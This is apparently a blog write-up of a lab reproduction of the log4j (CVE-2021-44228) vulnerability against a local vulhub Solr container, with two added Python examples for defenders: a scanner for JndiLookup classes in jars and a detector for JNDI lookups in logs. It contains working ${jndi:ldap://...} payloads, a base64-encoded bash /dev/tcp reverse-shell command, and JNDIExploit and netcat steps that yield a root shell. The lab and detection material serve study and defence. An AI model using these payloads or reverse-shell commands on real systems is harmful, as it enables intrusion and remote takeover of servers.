log4j Reproduction

Background

What is log4j

DNSLog platform

Vulnerability reproduction

Environment:

  • Target IP: 192.1.1.128
  • Attacker IP: 192.1.1.128
  • Relay host IP: 192.1.1.138

Installing vulhub

Once docker and docker-compose are installed, vulhub is ready to use

sudo apt install docker.io
sudo apt install docker-compose

For the git clone you can run git config --global https.proxy 'socks5://IP:Port' to route git through a local proxy port and speed up the download

git clone https://github.com/vulhub/vulhub.git

When pulling docker images it is advisable to switch to a Chinese registry mirror

sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<-'EOF'
{
  "registry-mirrors": [
    "https://docker.m.daocloud.io",
    "https://dockerproxy.com",
    "https://docker.mirrors.ustc.edu.cn",
    "https://docker.nju.edu.cn"
  ]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker

# test the pull speed
docker pull wordpress

Change into the vulnerability directory

cd vulhub-master/log4j/CVE-2021-44228

Pull the image automatically and bring up the vulnerable environment

┌──(kali㉿kali)-[~/vulhub/log4j/CVE-2021-44228]
└─$ docker-compose up -d
Pulling solr (vulhub/solr:8.11.0)...
8.11.0: Pulling from vulhub/solr
43c265008fae: Retrying in 1 second
43c265008fae: Pull complete
af36d2c7a148: Pull complete
2b7b4d10e1c1: Pull complete
f264389d8f2f: Pull complete
1a2c46e93f4a: Pull complete
f9506bb322c0: Pull complete
96f5dad14c2c: Pull complete
c387eff49cc3: Pull complete
Digest: sha256:84255b20a2d134fc97bbb0fab7cb826087098ee594fcbc94c3a71def24d31003
Status: Downloaded newer image for vulhub/solr:8.11.0
Creating cve-2021-44228_solr_1 ... done

Use docker ps to find the exposed port, then open it in a browser to confirm the web service is up
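The vulhub Solr image is exploitable because its bundled log4j-core still contains the JndiLookup class, which is the code path every ${jndi:...} payload used below goes through. As an added example (not part of the original post and not vulhub's code), the Python script below walks a directory, opens every .jar/.war/.ear with zipfile (recursing into nested archives such as WEB-INF/lib), reads the log4j-core version from its Maven pom.properties and reports whether JndiLookup.class is present. The archives produced by build_sample_tree() are constructed stand-ins, not real log4j builds.

```python
"""Inventory log4j-core archives and check for the JndiLookup class.

Added example, not from the original post. The fixture archives built by
build_sample_tree() are constructed; they only mimic the entry names a real
log4j-core jar has (pom.properties and the JndiLookup class entry).
"""
import io
import os
import tempfile
import zipfile

# Entry names as they appear inside a real log4j-core 2.x jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def _version_from_props(data: bytes):
    """Pull 'version=...' out of a Maven pom.properties file."""
    for line in data.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_archive(name: str, blob: bytes, depth: int = 0, max_depth: int = 2):
    """Return findings for one archive, recursing into nested archives (e.g. WEB-INF/lib)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return findings  # not a zip container: nothing to inspect
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = _version_from_props(zf.read(POM_PROPS)) if POM_PROPS in names else None
            findings.append({
                "archive": name,
                "version": version,
                "jndi_lookup_present": JNDI_CLASS in names,
            })
        if depth < max_depth:
            for inner in sorted(names):
                if inner.lower().endswith(ARCHIVE_EXT):
                    findings.extend(inspect_archive(f"{name}!{inner}", zf.read(inner), depth + 1, max_depth))
    return findings


def scan_tree(root: str):
    """Scan every archive below root; a finding with jndi_lookup_present=True needs attention."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(path, fh.read()))
    return findings


def _make_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry_name, data in entries.items():
            zf.writestr(entry_name, data)
    return buf.getvalue()


def build_sample_tree():
    """Constructed fixture: an unpatched look-alike jar, a WAR holding a copy with
    JndiLookup removed (the documented class-removal mitigation), and an unrelated jar."""
    root = tempfile.mkdtemp(prefix="log4jscan_")
    fake_class = b"\xca\xfe\xba\xbe"  # only the class-file magic; not real bytecode
    unpatched = _make_zip({POM_PROPS: b"version=2.14.1\n", JNDI_CLASS: fake_class})
    stripped = _make_zip({POM_PROPS: b"version=2.14.1\n",
                          "org/apache/logging/log4j/core/Core.class": fake_class})
    unrelated = _make_zip({"com/example/App.class": fake_class})
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(unpatched)
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(_make_zip({"WEB-INF/lib/log4j-core-stripped.jar": stripped,
                            "WEB-INF/lib/other.jar": unrelated}))
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding)
```

Run it against a real install with scan_tree("/opt/solr") (or the container's filesystem); any archive reporting jndi_lookup_present=True with a version below the fixed releases is the component this lab exploits.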

DNSLog test

First obtain a domain from the DNSLog platform, then capture the request with Burp, add the payload in a parameter and URL-encode it.

To build the payload we need to know the target URL, which can be found in existing blog posts or the official API documentation

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://daoshad.dnslog.cn}

You can open the link above directly in a browser (substituting your own path and domain)

Refreshing DNSLog.cn shows the record

Afterwards, running the JNDI injection tool failed with an error, probably a JDK version issue

┌──(kali㉿kali)-[~/tools]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE3Mi4xOC4wLjEvNjk2OSAwPiYxCg==}|{base64,-d}|{bash,-i}" -A 192.1.1.128
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[ADDRESS] >> 192.1.1.128
[COMMAND] >> bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE3Mi4xOC4wLjEvNjk2OSAwPiYxCg==}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.1.1.128:1099/vy06r4
ldap://192.1.1.128:1389/vy06r4
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.1.1.128:1099/jxriw9
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.1.1.128:1099/j4u6ro
ldap://192.1.1.128:1389/j4u6ro

----------------------------Server Log----------------------------
2023-07-27 06:40:31 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-07-27 06:40:32 [RMISERVER] >> Listening on 0.0.0.0:1099
2023-07-27 06:40:32 [LDAPSERVER] >> Listening on 0.0.0.0:1389
2023-07-27 06:41:26 [RMISERVER] >> Have connection from /172.18.0.2:41552
2023-07-27 06:41:26 [RMISERVER] >> Reading message...
2023-07-27 06:41:26 [RMISERVER] >> Is RMI.lookup call for vy06r4 2
2023-07-27 06:41:26 [RMISERVER] >> Closing connection
Exception in thread "Thread-1" java.lang.IllegalAccessError: class jndi.RMIRefServer (in unnamed module @0x4015e7ec) cannot access class com.sun.jndi.rmi.registry.ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi does not export com.sun.jndi.rmi.registry to unnamed module @0x4015e7ec
at jndi.RMIRefServer.handleRMI(RMIRefServer.java:343)
at jndi.RMIRefServer.doCall(RMIRefServer.java:299)
at jndi.RMIRefServer.doMessage(RMIRefServer.java:245)
at jndi.RMIRefServer.run(RMIRefServer.java:190)
at java.base/java.lang.Thread.run(Thread.java:833)

I picked another Ubuntu machine as a relay host and installed openjdk 1.8.0_362 on it

Reverse shell test

The tool used is zzwlpx/JNDIExploit: A malicious LDAP server for JNDI injection attacks (github.com). The environment is as described above; run it with Java 1.8 on the relay host:

ubuntu@ubuntu:~/tools/Log4j-exp/poc$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.1.1.138
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...

Start a listener on the attacker machine

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 6666
[sudo] password for kali:
listening on [any] 6666 ...

Next, build the reverse shell payload

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.1.1.138:1389/Basic/ReverseShell/192.1.1.128/6666}

Visiting it in the browser gives the following page

Checking the listener again shows the shell came back

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.1.1.128] from (UNKNOWN) [172.18.0.2] 60728
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@21f80351de19:/opt/solr/server#
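Both payloads in this post, the DNSLog probe and the reverse-shell one, arrive in a request parameter as a ${jndi:...} lookup (URL-encoded or not) and get written into the application's log, which is also where a defender can catch them. As an added example that is not part of the original post, the Python below URL-decodes request-log lines, extracts every ${jndi:<scheme>:...} lookup and reports the scheme, host and port the server would be made to contact. The access-log lines in SAMPLE_LOG are constructed; they embed the two URLs used above.

```python
"""Detect Log4Shell-style ${jndi:...} lookups in web request logs.

Added example, not from the original post. SAMPLE_LOG is constructed and
only reuses the two payload URLs shown in the post.
"""
import re
from urllib.parse import unquote

# Constructed access-log lines (not real captures). Line 1 carries the
# URL-encoded DNSLog probe, line 2 the reverse-shell lookup, line 3 is benign.
SAMPLE_LOG = """\
172.18.0.1 - - [27/Jul/2023:06:41:26 +0000] "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2Fdaoshad.dnslog.cn%7D HTTP/1.1" 200 -
172.18.0.1 - - [27/Jul/2023:06:55:10 +0000] "GET /solr/admin/cores?action=${jndi:ldap://192.1.1.138:1389/Basic/ReverseShell/192.1.1.128/6666} HTTP/1.1" 200 -
172.18.0.1 - - [27/Jul/2023:06:57:02 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 -
"""

# ${jndi:<scheme>:<rest>} where rest runs up to the closing brace.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):(?P<rest>[^}]*)\}", re.IGNORECASE)


def decode_fully(text: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing, so a payload encoded more
    than once is still matched; the round limit keeps pathological input bounded."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(line: str):
    """Return one dict per ${jndi:...} lookup found in the decoded line."""
    hits = []
    for m in JNDI_RE.finditer(decode_fully(line)):
        rest = m.group("rest")
        authority = rest[2:] if rest.startswith("//") else rest
        hostport, _, path = authority.partition("/")
        host, _, port = hostport.partition(":")
        hits.append({
            "scheme": m.group("scheme").lower(),  # ldap, rmi, dns, ...
            "host": host,                          # where the target would connect
            "port": int(port) if port.isdigit() else None,
            "path": path,
            "raw": m.group(0),
        })
    return hits


def scan_log(text: str):
    """Scan a whole log; each alert records the line number plus the lookup details."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for hit in find_jndi_lookups(line):
            alerts.append({"line": lineno, **hit})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"line {alert['line']}: {alert['scheme']} lookup to "
              f"{alert['host']}:{alert['port']} ({alert['raw']})")
```

Matching on the decoded request text is what catches the DNSLog probe, which the raw log only shows as %24%7Bjndi.... The corresponding network-side indicator is the Solr container opening an outbound LDAP or RMI connection (1389 and 1099 in this lab) or resolving the DNSLog name; the record that appeared on DNSLog.cn is that same resolution seen from the attacker's side.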

References

log4j-CVE-2021-44228-vulhub reproduction (WeChat official account 乌鸦安全)


Source: https://i3eg1nner.github.io/2023/07/e185c3944248.html
Author: I3eg1nner
Published: 27 July 2023